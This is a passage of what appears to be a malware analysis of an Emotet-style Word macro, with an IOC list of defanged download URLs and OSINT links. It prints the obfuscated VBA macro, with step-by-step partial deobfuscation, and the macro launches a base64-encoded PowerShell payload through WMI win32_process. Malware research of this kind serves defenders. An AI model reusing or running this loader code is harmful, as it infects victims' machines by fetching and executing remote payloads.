,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9, winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess + s + tar + tu + p\r\n      End Function\r\n\r\nFunction Zk46e7c8d40(G7b_e54iwh7id_)\r\n   On Error Resume Next\r\n   X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)\r\n   Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, &quot;g, bq,&quot;)\r\n   B4ru9eb_hhowd = 
Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)\r\n   Zk46e7c8d40 = B4ru9eb_hhowd\r\nEnd Function\r\n\r\n   Function Zk46e7c8d40(G7b_e54iwh7id_)\r\n      On Error Resume Next\r\n      X8e38jclqayh83g3a6 = &quot;g,bq,g,bq,wg,bq,ig,bq,nmg,bq,g,bq,gmg,bq,tg,bq,g,bq,&quot;+s+&quot;g,bq,g,bq,:g,bq,wg,bq,ing,bq,g,bq,3g,bq,2g,bq,_g,bq,&quot;+p+&quot;g,bq,rog,bq,g,bq,ceg,bq,sg,bq,sg,bq,&quot;\r\n      Hy1d43_mrbnkby5l = winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess\r\n      B4ru9eb_hhowd = winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess (Sg918dyn87p9_2\/Gcqeayz9i6vt1m44y1 gets dropped since null\/empty)\r\n      Zk46e7c8d40 = winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess\r\n   End Function\r\n\r\nFunction Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)\r\n   On Error Resume Next\r\n   Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)\r\n   showwindow = wdKeyEquals - wdKeyEquals\r\nEnd Function\r\n   \r\n   Function Ngdcwyg32b4skvo5c1(winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess + s + tar + tu + p)\r\n      On Error Resume Next\r\n      Set Ngdcwyg32b4skvo5c1 = GetObject(winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess + s + tar + tu + p)\r\n      showwindow = 0\r\n   End Function\r\n\r\nFunction Qfyk87zgdp86ufle()\r\n   On Error Resume Next\r\n   Puw2oumxgis = &quot;powe&quot; + &quot;rshe&quot; + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\n   Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)\r\nEnd Function\r\n\r\n   Function Qfyk87zgdp86ufle()\r\n      On Error Resume Next\r\n      Puw2oumxgis = &quot;powe&quot; + &quot;rshe&quot; + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, 
bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, 
bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9\r\n      \r\n      Qfyk87zgdp86ufle = &quot;powe&quot; + &quot;rshe&quot; + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, 
JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9\r\n   End Function\r\n\r\n      Function Zk46e7c8d40(G7b_e54iwh7id_)\r\n         On Error Resume Next\r\n         X8e38jclqayh83g3a6 = CleanString(&quot;powe&quot; + &quot;rshe&quot; + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, 
bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, 
bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9)\r\n         Hy1d43_mrbnkby5l = 
Split(X8e38jclqayh83g3a6, &quot;g, bq,&quot;)\r\n         B4ru9eb_hhowd = &quot;powe&quot; + &quot;rshe&quot; + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9\r\n         Zk46e7c8d40 = B4ru9eb_hhowd\r\n      End Function\r\n<\/pre>\n<p>Artifacts<br 
\/>\n==========<\/p>\n<p>IOCs<br \/>\n&#8212;&#8211;<br \/>\nhxxp:\/\/haymetetrading[.]com\/wp-includes\/yGELKj4\/<br \/>\nhxxp:\/\/simofferbd24[.]com\/wp-includes\/fsiQc\/<br \/>\nhxxp:\/\/401kplansinfo[.]com\/cgi-bin\/KtFRk\/<br \/>\nhxxp:\/\/fidelityguide[.]com\/cgi-bin\/VA\/<br \/>\nhxxps:\/\/sirnakmidyeci[.]com\/wp-includes\/qk9wW2\/<br \/>\nhxxps:\/\/subitocarne[.]com\/wp-content\/ByeOAt9\/<br \/>\nhxxps:\/\/eliesalibaarchitect[.]com\/wordpress\/T\/<\/p>\n<p>OSINT<br \/>\n&#8212;&#8212;&#8211;<br \/>\n<a href=\"http:\/\/twitter.com\/Cryptolaemus1\/status\/1308071468815847426\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/twitter.com\/Cryptolaemus1\/status\/1308071468815847426<\/a><br \/>\n<a href=\"http:\/\/pastebin.com\/UYbUAeuS\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/pastebin.com\/UYbUAeuS<\/a> &#8211; Emotet Epoch 2 IOCs as of 2020-09-21 15:05 US\/Eastern<br \/>\n<a href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Fhaymetetrading.com%2Fwp-includes%2FyGELKj4%2F+\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Fhaymetetrading.com%2Fwp-includes%2FyGELKj4%2F+<\/a><br \/>\n<a href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Fsimofferbd24.com%2Fwp-includes%2FfsiQc%2F\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Fsimofferbd24.com%2Fwp-includes%2FfsiQc%2F<\/a><br \/>\n<a 